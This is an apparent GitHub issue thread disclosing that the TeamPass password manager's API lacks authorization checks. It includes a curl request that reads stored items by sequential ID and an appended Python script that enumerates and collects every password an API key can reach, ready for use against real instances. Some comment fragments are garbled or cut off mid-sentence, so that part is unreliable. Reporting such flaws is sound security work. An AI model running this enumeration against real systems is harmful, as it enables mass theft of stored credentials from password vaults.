TeamPass API has no authorization checks #2765
Hey @bstapes, when running the retrieval of passwords in the "cycle for" I get {"err":"No results"} 5x.
@sata-sa I suspect your instance of TeamPass is not actually storing any secrets. If you look at the If there is no item with that number, you will get Try this:
Just to complement this issue, I could find other potential security issues related to user API keys:
TeamPass provides several APIs that can be used for programmatic access. None of these API functions perform authorization checks, which means that any client with a valid API token is effectively an administrator. Any client with a valid API token can:
It’s important to note that API access is disabled by default.
Steps to reproduce
Retrieve passwords:

```sh
curl "http://<your TeamPass instance>/teampass/api/index.php/read/items/1?apikey=<your key>"
```
Note that the ID for each "item" starts at 1 and increments by 1 for each new item. This makes it easy to retrieve all items stored by TeamPass.
Add a new admin user
Server configuration

TeamPass version: 2.1.27.36
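To show what the sequential item IDs plus a missing authorization check amount to in practice, here is an added example (not TeamPass code, and not from anyone in this thread) that walks `read/items/<id>` upward from ID 1 with one API key and stops after a run of misses. It assumes only what the report shows: the URL layout from the curl command above, and that a missing ID answers `{"err":"No results"}` as the "5x" comment reports. The `make_fake_fetch` stand-in and `SAMPLE_STORE` are constructed here so the script runs offline; swap in `http_fetch` (plain `urllib`) to point it at a real instance whose API access has been enabled.

```python
"""Enumerate TeamPass items through the read/items API.

Added example, not part of TeamPass. Assumes the URL layout
<base>/api/index.php/read/items/<id>?apikey=<key> from the issue and that a
missing item returns {"err": "No results"} (the response the comment reports).
"""
import json
import urllib.parse
import urllib.request
from typing import Callable, Dict

NO_RESULTS = {"err": "No results"}


def build_item_url(base: str, item_id: int, api_key: str) -> str:
    """Build the read/items URL used in the issue's reproduction step."""
    query = urllib.parse.urlencode({"apikey": api_key})
    return f"{base.rstrip('/')}/api/index.php/read/items/{item_id}?{query}"


def http_fetch(url: str, timeout: float = 10.0) -> dict:
    """Real fetcher: GET the URL and parse the JSON body (needs network)."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return json.loads(resp.read().decode("utf-8"))


def enumerate_items(base: str, api_key: str,
                    fetch: Callable[[str], dict] = http_fetch,
                    start: int = 1, max_consecutive_misses: int = 5,
                    limit: int = 10_000) -> Dict[int, dict]:
    """Walk IDs upward from `start` and collect every item the key can read.

    A deleted item leaves a hole in the sequence, so a single "No results"
    is not the end; stop only after `max_consecutive_misses` holes in a row
    (or after `limit` IDs, as a safety cap).
    """
    found: Dict[int, dict] = {}
    misses = 0
    item_id = start
    while item_id < start + limit:
        body = fetch(build_item_url(base, item_id, api_key))
        if body == NO_RESULTS:
            misses += 1
            if misses >= max_consecutive_misses:
                break
        else:
            misses = 0
            found[item_id] = body
        item_id += 1
    return found


def make_fake_fetch(store: Dict[int, dict]) -> Callable[[str], dict]:
    """Constructed stand-in for a TeamPass instance: answers from `store`,
    returning the "No results" error for any ID it does not hold."""
    def fetch(url: str) -> dict:
        path = urllib.parse.urlsplit(url).path
        requested = int(path.rsplit("/", 1)[1])
        return store.get(requested, dict(NO_RESULTS))
    return fetch


# Constructed sample data: IDs 1, 2 and 4 exist; 3 was deleted (a hole).
SAMPLE_STORE = {
    1: {"id": "1", "label": "router", "login": "admin", "pw": "hunter2"},
    2: {"id": "2", "label": "db", "login": "app", "pw": "s3cret"},
    4: {"id": "4", "label": "vpn", "login": "ops", "pw": "changeme"},
}

if __name__ == "__main__":
    items = enumerate_items("http://teampass.example/teampass", "KEY",
                            fetch=make_fake_fetch(SAMPLE_STORE))
    for item_id, body in sorted(items.items()):
        print(item_id, body["label"], body["login"])
```

Against an instance with no items at all, the loop sees `{"err":"No results"}` for IDs 1 through 5 and returns an empty dict, which is exactly the "No results 5x" output reported above; that symptom is an empty store, not a failed key.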